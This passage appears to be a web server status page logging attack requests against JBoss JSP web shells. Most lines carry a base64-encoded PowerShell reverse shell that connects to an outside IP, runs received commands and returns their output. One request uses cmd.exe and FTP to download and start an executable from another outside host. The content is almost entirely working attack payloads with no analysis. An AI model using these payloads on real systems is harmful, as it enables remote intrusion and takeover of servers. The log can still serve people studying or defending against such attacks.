4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
R??????
S24428776 ms0 KB0 KB104.200.67.381.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
S23895841 ms0 KB0 KB104.200.67.381.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
R??????
S96715018 ms0 KB0 KB104.200.67.381.45.140.46GET /jexws4/jexws4.jsp?ppp=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwADQALgAyADAAMAAuADYANwAuADMAIgAsADYAMQAxADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
S527159448 ms0 KB0 KB31.192.104.15781.45.140.46GET /jbossass/jbossass.jsp?ppp=cmd.exe+%2Fc+%40echo+open+89.34.27.167%3Ecksadt.txt%26%40echo+binary%3E%3Ecksadt.txt%26%40echo+get+%2Fwinscp1.3.exe+C%3A%5CWindows%5CTemp%5Cwinscp1.3.exe%3E%3Ecksadt.txt%26%40echo+quit%3E%3Ecksadt.txt%26%40ftp+-s%3Acksadt.txt+-v+-A%26%40start+winscp1.3.exe HTTP/1.1

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive